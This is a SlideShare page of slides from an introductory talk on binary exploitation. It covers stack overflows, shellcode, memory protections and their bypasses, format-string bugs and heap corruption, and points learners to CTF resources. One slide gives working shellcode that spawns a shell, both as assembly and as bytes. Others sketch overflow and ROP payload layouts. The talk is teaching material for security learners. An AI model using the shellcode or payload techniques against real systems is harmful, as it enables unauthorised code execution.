SlideShare a Scribd company logo

[DSC] Introduction to Binary Exploitation

F
Florian Müller

This event is part of our ongoing series about IT Security. In this session, Carl Svensson, a security professional working in the Google Offensive Security team, gives us an introduction to Binary Exploitation. Watch the recording at https://dscmunich.de/binexp

Technology
1 of 35
Proprietary Carl Svensson/2020-01-28 An Introduction to
Proprietary Proprietary ● MSc in Computer Science, KTH ● Security Engineer @ Google - Offensive Security ● CTF Player: HackingForSoju ● Email: zetatwo@google.com / Twitter: @zetatwo Biography
Proprietary Agenda ● Background ● Stack-based Exploitation ● Protections and bypasses ● Heap-based exploitations ● Next steps
Proprietary Proprietary Background
Proprietary Proprietary ● Programmer ● Security Interested ● Basic knowledge of some low-level language, e.g. C or C++ ● Basic understanding of operating systems Who Are You?
Proprietary Proprietary What is an Exploit? ● Unintended behaviour ● State machine ○ Initial state ○ Reachable state ○ Invalid state ● Vulnerability ○ Unintended transition (bug) ○ Enabling an exploit ● Exploit ○ Transition to an Invalid state ○ "Dangerous" subset
Proprietary Proprietary A Note on Data ● We organize bits into groups - nibble, byte, word, dword, qword ● Bits are interpreted as integers, text, code, addresses, etc. ● Same data, different interpretations - Context determines ● Remember endianness - Little vs big 65, 66, 67, 68 "ABCD" inc ecx; inc edx; inc ebx; inc esp 0x44434241 = 1145258561 Little: 0x44332211 = 0x11 0x22 0x33 0x44 Big: 0x44332211 = 0x44 0x33 0x22 0x11
Proprietary Proprietary Where are We? ● Physics - Maxwell’s equations ● Circuits - Gates, flip-flops, wires ● Micro-architecture - Internals of CPU ● Machine code - Assembly translated to bytes ● Low-level code - C, Rust ● Mid-level code - Java, C# ● High-level code - Python, Javascript
Proprietary Proprietary x86 Basics
Proprietary Proprietary ● Virtual memory ● Stack ● Heap ● Code - Text x86 Memory
Proprietary Proprietary ● General purpose ○ RAX, RBX, RCX, RDX ○ RDI, RSI, R8, R9 ● Special purpose ○ RIP, RBP, RSP ● ...and a few hundred more x86 Registers
Proprietary Proprietary ● Architecture specific ● x86, 32 bit, 64 bit ● Arguments ○ 32 bit: stack in reverse order ○ 64 bit: first few in registers ● Stack frame - base pointer x86 Calling convention call 0xCAFEC0DE ... push eip+5 jmp 0xCAFEC0DE call rip+0x1337 ... push rip+5 jmp rip+0x1337 ret pop eip ret pop rip f(a, b) push b; push a call f f(a, b) mov rdi a; mov rsi b; call f
Proprietary Proprietary Stack-based Exploits
Proprietary Proprietary ● Unchecked write ● Overwrite adjacent memory ● Overwrite return address Stack buffer Overflow void vuln() { long local1; char buf[16]; fgets(buf); } Program received signal SIGSEGV, Segmentation fault. 0x4B4B4B4B4A4A4A4A in example1 () [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [AAAABBBBCCCCDDDD] [EEEEFFFF] [GGGGHHHH] [JJJJKKKK]
Proprietary Proprietary ● Code that launches a shell ● Can also do other things ● Mostly written in C or ASM ● Needs to be location independent Shellcode xor rdx, rdx mov qword rbx, '//bin/sh' shr rbx, 0x8 push rbx mov rdi, rsp push rax push rdi mov rsi, rsp mov al, 0x3b syscall 0x48 0x31 0xd2 0x48 0xbb 0x2f 0x2f 0x62 0x69 0x6e 0x2f 0x73 0x68 0x48 0xc1 0xeb 0x08 0x53 0x48 0x89 0xe7 0x50 0x57 0x48 0x89 0xe6 0xb0 0x3b 0x0f 0x05
Proprietary Proprietary ● No protections present ● No longer viable ● A simple attack ○ Inject code ○ Overwrite return address with shellcode location Stack buffer overflow -96 void vuln() { long local1; char buf[16]; fgets(buf); } $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] 0x00007FFFDEADC0DE: [0x48 0x31 0xd2 0x48 ...] [...] [... 0x3b 0x0f 0x05] [0x00007FFFDEADC0DE]
Proprietary Proprietary ● Shellcode can be moved around ● For example further down the stack ● If exact location is unknown ○ NOP sled Shellcode placement void vuln() { long local1; char buf[12]; fgets(buf); } $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (12 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)] 0x00007FFFDEADC0DE: [...] [...] [...] [0x00007FFFDEADC102] [0x48 0x31 0xd2 …]
Proprietary Proprietary ● Address Space Layout Randomization ● Randomize location of stack and heap ○ 32 bit: 12 bit entropy ○ 64 bit: 28 bit entropy ● So far code location still known ● Location of buffer now unknown ● Code reuse ○ Gadgets Protection: ASLR -01 0x00007FFFCAFECAFE: jmp rsp $ uname -a Linux pwnbox 5.4.0-12.15-generic... [buf (16 bytes)] [local1 (8 bytes)] [saved bp (8 bytes)] [return address (8 bytes)] [prev frame (? bytes)] 0x????????: [...] [...] [...] [0x00007FFFCAFECAFE] [0x48 0x31 0xd2 …]
Proprietary Proprietary ● Adds permission bits to memory ○ Code: RX ○ Heap+Stack: RW ● Shellcode on stack not possible ● Code location know ● Gadgets ○ Return-oriented programming Protection: NX/DEP -97 0x4000104A: ... pop eax ret 0x4000106A: ... pop ebx pop ecx ret 0x????????: [AAAA...DDDD] [EEEE] [FFFF] [0x4000104A] [0xDEADBEEF] [0x4000106A] [0xCAFEBABE] [0xFEEDF00D] eax = 0xDEADBEEF ebx = 0xCAFEBABE ecx = 0xFEEDF00D
Proprietary Proprietary ● Catch the overflow before damage ● Canary - random secret value ● The crash becomes controlled ● Relies on canary being secret ○ Memory leak ○ Forking servers Protection: StackGuard -98 void vuln() { long local1; char buf[12]; fgets(buf); } *** stack smashing detected ***: ./a.out terminated ======= Backtrace: ========= SECRET = ??? [...] [...] [SECRET] [saved bp (8 bytes)] [return address (8 bytes)] [...] [...] [0x4141414141414141] [0x4141414141414141] [0x00007FFFDEADC0DE] void vuln() { push_cookie(); long local1; char buf[12]; fgets(buf); check_cookie(); }
Proprietary Proprietary ● Program Linkage Table, PLT ● Global Offset Table, GOT ● PLT contains stubs with jumps ● GOT contains addresses to libraries ● Overwrite GOT entry and call function GOT/PLT Overwrite ... call printf@plt ... printf@plt: jmp [printf@got] printf@got: 0x7FFFC0DECAFE printf@got: 0x7FFFDEADDEAD … call printf@plt -> 0x7FFFDEADDEAD ...
Proprietary Proprietary ● RELocation Read Only, RELRO ● “Partial RELRO” ○ GOT before BSS ● Full RELRO ○ Actually Read Only ○ Handled by loader Protection: RELRO ... call printf@plt ... printf@plt: jmp [printf@got] printf@got: 0x7FFFC0DECAFE printf@got: 0x7FFFDEADDEAD … call printf@plt -> 0x7FFFC0DECAFE ...
Proprietary Proprietary ● Stack frames - linked list ● Misalign stack frame ○ Modify local variables ○ Modify stack pointer ● Partial overwrite ○ Shift stack frame Base Pointer Overwrite
Proprietary Proprietary ● Control Flow Guard ● Control Flow Integrity ● Intended to prevent code-reuse attacks ● Bypass example: JIT Protection: CFG (-14)
Proprietary Proprietary ● Pointer Authentication Code ● Reuse unused bits for MAC ● Hardware support ● ARM64, Apple iOS ● Bypass: signing oracle ○ Project Zero blog Protection: PAC (-17)
Proprietary Proprietary ● Calls to printf-like functions ● Control over first argument ● Variable number of arguments ● Read direct: %x/%d ● Read indirect: %s ● Write: %n ● Copy: %0*x, %n ● Skip: %4$x Format String Vulnerability int printf ( const char * format, ... ); printf("Name: %s, age: %d", name, age); // Ok printf(name); // Vulnerable
Proprietary Proprietary Heap-based Exploits
Proprietary Proprietary ● Physical ● Virtual ● Pages ● Memory allocator ○ malloc/free ○ glibc ○ jemalloc A Refresher on Memory
Proprietary Proprietary ● Heap overflow ● Use after free ● Type confusion ● Heap spraying Heap corruption: app layer
Proprietary Proprietary ● Corrupt allocator metadata ● Linked lists ● Requires understanding of allocator ○ Slabs ○ Bins ○ Cache ● glibc - House of X Heap corruption: allocator
Proprietary Proprietary Proprietary Next Steps
Proprietary Want to try it out? Capture the Flag Wargames Community https://capturetheflag.withgoogle.com https://ctftime.org https://picoctf.com https://github.com/zardus/wargame-nexus https://pwnable.kr https://overthewire.org CTF players Discord: https://discord.gg/ArjWjvctft
Proprietary Further Materials Videos Tools Learning https://securitycreators.video https://www.youtube.com/GynvaelEN https://www.youtube.com/ZetaTwo https://www.youtube.com/LiveOverflow Python + Pwntools gdb + gef IDA, Binary Ninja, Ghidra https://pwn.college https://github.com/RPISEC/MBE https://github.com/shellphish/how2heap
Proprietary Interested in Google? Internships and full-time positions: https://careers.google.com/students Questions about working at Google, specifically security: Email zetatwo@google.com or Twitter @zetatwo
Proprietary Thank You

Recommended

Specializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network StackSpecializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network Stack
Kernel TLV
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
DefconRussia
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
Hacks in Taiwan (HITCON)
 
Thrfit从入门到精通
Thrfit从入门到精通Thrfit从入门到精通
Thrfit从入门到精通
炜龙 何
 
Sysprog17
Sysprog17Sysprog17
Sysprog17
Ahmed Mekkawy
 
AllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW SecurityAllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW Security
AllBits BVBA (freelancer)
 
Nmap5.cheatsheet.eng.v1
Nmap5.cheatsheet.eng.v1Nmap5.cheatsheet.eng.v1
Nmap5.cheatsheet.eng.v1
Arduino Aficionado
 
Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment
isc2-hellenic
 

Recommended

Specializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network StackSpecializing the Data Path - Hooking into the Linux Network Stack
Specializing the Data Path - Hooking into the Linux Network Stack
Kernel TLV
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
DefconRussia
 
Ctf hello,world!
Ctf hello,world! Ctf hello,world!
Ctf hello,world!
Hacks in Taiwan (HITCON)
 
Thrfit从入门到精通
Thrfit从入门到精通Thrfit从入门到精通
Thrfit从入门到精通
炜龙 何
 
Sysprog17
Sysprog17Sysprog17
Sysprog17
Ahmed Mekkawy
 
AllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW SecurityAllBits presentation - Lower Level SW Security
AllBits presentation - Lower Level SW Security
AllBits BVBA (freelancer)
 
Nmap5.cheatsheet.eng.v1
Nmap5.cheatsheet.eng.v1Nmap5.cheatsheet.eng.v1
Nmap5.cheatsheet.eng.v1
Arduino Aficionado
 
Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment Flowchart - Building next gen malware behavioural analysis environment
Flowchart - Building next gen malware behavioural analysis environment
isc2-hellenic
 
Android ndk
Android ndkAndroid ndk
Android ndkKuban Dzhakipov
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...RootedCON
 
DConf 2016: Keynote by Walter Bright
DConf 2016: Keynote by Walter Bright DConf 2016: Keynote by Walter Bright
DConf 2016: Keynote by Walter Bright
Andrei Alexandrescu
 
My talk about Tarantool and Lua at Percona Live 2016
My talk about Tarantool and Lua at Percona Live 2016My talk about Tarantool and Lua at Percona Live 2016
My talk about Tarantool and Lua at Percona Live 2016
Konstantin Osipov
 
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
Area41
 
Making OpenBSD Useful on the Octeon Network Gear by Paul Irofti
Making OpenBSD Useful on the Octeon Network Gear by Paul IroftiMaking OpenBSD Useful on the Octeon Network Gear by Paul Irofti
Making OpenBSD Useful on the Octeon Network Gear by Paul Irofti
eurobsdcon
 
Tensor Core
Tensor CoreTensor Core
Tensor Core
Mindos Cheng
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
Angel Boy
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
Defeating the entropy downgrade attack
Defeating the entropy downgrade attackDefeating the entropy downgrade attack
Defeating the entropy downgrade attack
Seth Wahle
 
How to write rust instead of c and get away with it
How to write rust instead of c and get away with itHow to write rust instead of c and get away with it
How to write rust instead of c and get away with it
Flavien Raynaud
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
Angel Boy
 
Terminals and Shells
Terminals and ShellsTerminals and Shells
Terminals and Shells
Hoffman Lab
 
Pledge in OpenBSD
Pledge in OpenBSDPledge in OpenBSD
Pledge in OpenBSD
Giovanni Bechis
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
Pf: the OpenBSD packet filter
Pf: the OpenBSD packet filterPf: the OpenBSD packet filter
Pf: the OpenBSD packet filter
Giovanni Bechis
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
Mihir Shah
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
Asynchronous single page applications without a line of HTML or Javascript, o...
Asynchronous single page applications without a line of HTML or Javascript, o...Asynchronous single page applications without a line of HTML or Javascript, o...
Asynchronous single page applications without a line of HTML or Javascript, o...
Robert Schadek
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
Russell Sanford
 
Caching in
Caching inCaching in
Caching inRichardWarburton
 
Caching in (DevoxxUK 2013)
Caching in (DevoxxUK 2013)Caching in (DevoxxUK 2013)
Caching in (DevoxxUK 2013)
RichardWarburton
 

More Related Content

What's hot

Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...RootedCON
 
DConf 2016: Keynote by Walter Bright
DConf 2016: Keynote by Walter Bright DConf 2016: Keynote by Walter Bright
DConf 2016: Keynote by Walter Bright
Andrei Alexandrescu
 
My talk about Tarantool and Lua at Percona Live 2016
My talk about Tarantool and Lua at Percona Live 2016My talk about Tarantool and Lua at Percona Live 2016
My talk about Tarantool and Lua at Percona Live 2016
Konstantin Osipov
 
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
Area41
 
Making OpenBSD Useful on the Octeon Network Gear by Paul Irofti
Making OpenBSD Useful on the Octeon Network Gear by Paul IroftiMaking OpenBSD Useful on the Octeon Network Gear by Paul Irofti
Making OpenBSD Useful on the Octeon Network Gear by Paul Irofti
eurobsdcon
 
Tensor Core
Tensor CoreTensor Core
Tensor Core
Mindos Cheng
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
Angel Boy
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64FFRI, Inc.
 
Defeating the entropy downgrade attack
Defeating the entropy downgrade attackDefeating the entropy downgrade attack
Defeating the entropy downgrade attack
Seth Wahle
 
How to write rust instead of c and get away with it
How to write rust instead of c and get away with itHow to write rust instead of c and get away with it
How to write rust instead of c and get away with it
Flavien Raynaud
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
Angel Boy
 
Terminals and Shells
Terminals and ShellsTerminals and Shells
Terminals and Shells
Hoffman Lab
 
Pledge in OpenBSD
Pledge in OpenBSDPledge in OpenBSD
Pledge in OpenBSD
Giovanni Bechis
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
hackstuff
 
Pf: the OpenBSD packet filter
Pf: the OpenBSD packet filterPf: the OpenBSD packet filter
Pf: the OpenBSD packet filter
Giovanni Bechis
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
Mihir Shah
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
Alexandre Moneger
 
Asynchronous single page applications without a line of HTML or Javascript, o...
Asynchronous single page applications without a line of HTML or Javascript, o...Asynchronous single page applications without a line of HTML or Javascript, o...
Asynchronous single page applications without a line of HTML or Javascript, o...
Robert Schadek
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
Russell Sanford
 

What's hot (20)

Android ndk
Android ndkAndroid ndk
Android ndk
 
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...
 
DConf 2016: Keynote by Walter Bright
DConf 2016: Keynote by Walter Bright DConf 2016: Keynote by Walter Bright
DConf 2016: Keynote by Walter Bright
 
My talk about Tarantool and Lua at Percona Live 2016
My talk about Tarantool and Lua at Percona Live 2016My talk about Tarantool and Lua at Percona Live 2016
My talk about Tarantool and Lua at Percona Live 2016
 
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
hashdays 2011: Ange Albertini - Such a weird processor - messing with x86 opc...
 
Making OpenBSD Useful on the Octeon Network Gear by Paul Irofti
Making OpenBSD Useful on the Octeon Network Gear by Paul IroftiMaking OpenBSD Useful on the Octeon Network Gear by Paul Irofti
Making OpenBSD Useful on the Octeon Network Gear by Paul Irofti
 
Tensor Core
Tensor CoreTensor Core
Tensor Core
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
 
Exploring the x64
Exploring the x64Exploring the x64
Exploring the x64
 
Defeating the entropy downgrade attack
Defeating the entropy downgrade attackDefeating the entropy downgrade attack
Defeating the entropy downgrade attack
 
How to write rust instead of c and get away with it
How to write rust instead of c and get away with itHow to write rust instead of c and get away with it
How to write rust instead of c and get away with it
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)
 
Terminals and Shells
Terminals and ShellsTerminals and Shells
Terminals and Shells
 
Pledge in OpenBSD
Pledge in OpenBSDPledge in OpenBSD
Pledge in OpenBSD
 
ROP 輕鬆談
ROP 輕鬆談ROP 輕鬆談
ROP 輕鬆談
 
Pf: the OpenBSD packet filter
Pf: the OpenBSD packet filterPf: the OpenBSD packet filter
Pf: the OpenBSD packet filter
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
 
08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one08 - Return Oriented Programming, the chosen one
08 - Return Oriented Programming, the chosen one
 
Asynchronous single page applications without a line of HTML or Javascript, o...
Asynchronous single page applications without a line of HTML or Javascript, o...Asynchronous single page applications without a line of HTML or Javascript, o...
Asynchronous single page applications without a line of HTML or Javascript, o...
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 

Similar to [DSC] Introduction to Binary Exploitation

Caching in (DevoxxUK 2013)
Caching in (DevoxxUK 2013)Caching in (DevoxxUK 2013)
Caching in (DevoxxUK 2013)
RichardWarburton
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Kernel TLV
 
Address/Thread/Memory Sanitizer
Address/Thread/Memory SanitizerAddress/Thread/Memory Sanitizer
Address/Thread/Memory Sanitizer
Platonov Sergey
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
Kernel TLV
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugsComputer Science Club
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
Japneet Singh
 
The Silence of the Canaries
The Silence of the CanariesThe Silence of the Canaries
The Silence of the Canaries
Kernel TLV
 
Devirtualizing FinSpy
Devirtualizing FinSpyDevirtualizing FinSpy
Devirtualizing FinSpyjduart
 
Compiler basics: lisp to assembly
Compiler basics: lisp to assemblyCompiler basics: lisp to assembly
Compiler basics: lisp to assembly
Phil Eaton
 
Binary art - Byte-ing the PE that fails you (extended offline version)
Binary art - Byte-ing the PE that fails you (extended offline version)Binary art - Byte-ing the PE that fails you (extended offline version)
Binary art - Byte-ing the PE that fails you (extended offline version)
Ange Albertini
 
Linux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloudLinux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloud
Andrea Righi
 
Why learn Internals?
Why learn Internals?Why learn Internals?
Why learn Internals?
Shaul Rosenzwieg
 
Potapenko, vyukov forewarned is forearmed. a san and tsan
Potapenko, vyukov forewarned is forearmed. a san and tsanPotapenko, vyukov forewarned is forearmed. a san and tsan
Potapenko, vyukov forewarned is forearmed. a san and tsanDefconRussia
 
Jvm profiling under the hood
Jvm profiling under the hoodJvm profiling under the hood
Jvm profiling under the hood
RichardWarburton
 
Happy To Use SIMD
Happy To Use SIMDHappy To Use SIMD
Happy To Use SIMD
Wei-Ta Wang
 
Format String Vulnerability
Format String VulnerabilityFormat String Vulnerability
Format String Vulnerability
Jian-Yu Li
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
Quinn Wilton
 
Cryptography 202
Cryptography 202Cryptography 202
Cryptography 202
UTD Computer Security Group
 
Advanced Linux Game Programming
Advanced Linux Game ProgrammingAdvanced Linux Game Programming
Advanced Linux Game Programming
Leszek Godlewski
 

Similar to [DSC] Introduction to Binary Exploitation (20)

Caching in
Caching inCaching in
Caching in
 
Caching in (DevoxxUK 2013)
Caching in (DevoxxUK 2013)Caching in (DevoxxUK 2013)
Caching in (DevoxxUK 2013)
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
 
Address/Thread/Memory Sanitizer
Address/Thread/Memory SanitizerAddress/Thread/Memory Sanitizer
Address/Thread/Memory Sanitizer
 
Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545Bypassing ASLR Exploiting CVE 2015-7545
Bypassing ASLR Exploiting CVE 2015-7545
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs
 
Bypassing DEP using ROP
Bypassing DEP using ROPBypassing DEP using ROP
Bypassing DEP using ROP
 
The Silence of the Canaries
The Silence of the CanariesThe Silence of the Canaries
The Silence of the Canaries
 
Devirtualizing FinSpy
Devirtualizing FinSpyDevirtualizing FinSpy
Devirtualizing FinSpy
 
Compiler basics: lisp to assembly
Compiler basics: lisp to assemblyCompiler basics: lisp to assembly
Compiler basics: lisp to assembly
 
Binary art - Byte-ing the PE that fails you (extended offline version)
Binary art - Byte-ing the PE that fails you (extended offline version)Binary art - Byte-ing the PE that fails you (extended offline version)
Binary art - Byte-ing the PE that fails you (extended offline version)
 
Linux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloudLinux kernel tracing superpowers in the cloud
Linux kernel tracing superpowers in the cloud
 
Why learn Internals?
Why learn Internals?Why learn Internals?
Why learn Internals?
 
Potapenko, vyukov forewarned is forearmed. a san and tsan
Potapenko, vyukov forewarned is forearmed. a san and tsanPotapenko, vyukov forewarned is forearmed. a san and tsan
Potapenko, vyukov forewarned is forearmed. a san and tsan
 
Jvm profiling under the hood
Jvm profiling under the hoodJvm profiling under the hood
Jvm profiling under the hood
 
Happy To Use SIMD
Happy To Use SIMDHappy To Use SIMD
Happy To Use SIMD
 
Format String Vulnerability
Format String VulnerabilityFormat String Vulnerability
Format String Vulnerability
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Cryptography 202
Cryptography 202Cryptography 202
Cryptography 202
 
Advanced Linux Game Programming
Advanced Linux Game ProgrammingAdvanced Linux Game Programming
Advanced Linux Game Programming
 

Recently uploaded

FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.Welocme to ViralQR, your best QR code generator.
Welocme to ViralQR, your best QR code generator.
ViralQR
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024By Design, not by Accident - Agile Venture Bolzano 2024
By Design, not by Accident - Agile Venture Bolzano 2024
Pierluigi Pugliese
 
Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !Securing your Kubernetes cluster_ a step-by-step guide to success !
Securing your Kubernetes cluster_ a step-by-step guide to success !
KatiaHIMEUR1
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...A tale of scale & speed: How the US Navy is enabling software delivery from l...
A tale of scale & speed: How the US Navy is enabling software delivery from l...
sonjaschweigert1
 
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
GenAISummit 2024 May 28 Sri Ambati Keynote: AGI Belongs to The Community in O...
Sri Ambati
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
Laura Byrne
 
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdfFIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance Osaka Seminar: Passkeys at Amazon.pdf
FIDO Alliance
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
Elena Simperl
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
UiPath Test Automation using UiPath Test Suite series, part 4
